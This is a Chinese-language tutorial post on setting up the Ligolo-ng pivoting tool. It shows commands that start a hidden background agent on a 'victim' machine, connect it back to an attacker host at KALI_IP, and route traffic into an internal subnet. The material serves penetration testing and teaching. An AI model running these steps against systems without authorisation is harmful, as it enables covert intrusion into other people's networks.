隧道代理工具 - Ligolo-ng

发布于: 2026-07-16 19:23

介绍

Ligolo-ng是一款简单、轻量级且快速的工具,它允许渗透测试人员使用tun 接口从反向 TCP/TLS 连接建立隧道(无需 SOCKS)

项目地址:https://github.com/nicocha30/ligolo-ng

官网文档:https://docs.ligolo.ng/

优势

  • 使用简单
  • 隧道接口(不再使用 SOCKS!)
  • 支持多种平台(Linux、Windows、macOS)
  • 高性能
  • 不需要高权限
  • 使用 Let's Encrypt 自动配置证书

攻击机(kali)需要有权限创建tun网卡接口,对于靶机来说,ligolo-ng不需要高权限即可运行

安装

预编译二进制文件

Github Releasehttps://github.com/nicocha30/ligolo-ng/releases获取最新预编译版本二进制文件(Windows/Linux/macOS/BSD)

kali存储库

Ligolo-ng 现在已默认包含在 Kali Linux 中,使用以下命令安装它:

apt install ligolo-ng

快速入门

帮助信息

# -laddr <addr> 监听地址,默认 0.0.0.0:11601
# -selfcert 生成自签名证书
# -certfile <cert> 指定证书文件
# -keyfile <key> 指定密钥文件
# -autocert 使用 Let's Encrypt 自动配置证书
# -config <file> 指定配置文件
./proxy [-laddr <addr>]  [-selfcert] [-certfile <cert> -keyfile <key>] [-autocert] [-config <file>] [-v] [-daemon]

攻击机(kali)启动 Ligolo-ng 代理服务器(默认端口 11601):

# 攻击机
./proxy -selfcert

在目标(受害者)计算机上启动代理(无需任何权限):

# linux
./agent -connect KALI_IP:11601 -ignore-cert
# windows
agent.exe -connect KALI_IP:11601 -ignore-cert
# 放后台运行
start /B "" cmd /c "agent.exe -connect KALI_IP:11601 -ignore-cert"

目标机器启动代理后,攻击机会提示收到一个会话

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
# 显示当前会话列表
session
# 选择 agent
session 1
# 提示选择创建接口及要添加的路由,是否开启转发流量等(推荐)
autoroute
# 手动添加路由
route_add 172.16.0.0/24 ligolo
# 启动隧道(开始转发流量)
start

TLS选项

  • -ignore-cert:Agent 端跳过 TLS 证书校验(配合 -selfcert 使用)
  • -autocert:使用 Let's Encrypt 自动签发证书(需公网 IP、80/443 端口、合法域名)
  • -certfile / -keyfile:使用自定义证书和私钥
  • -selfcert:自动生成自签名证书(Proxy 端)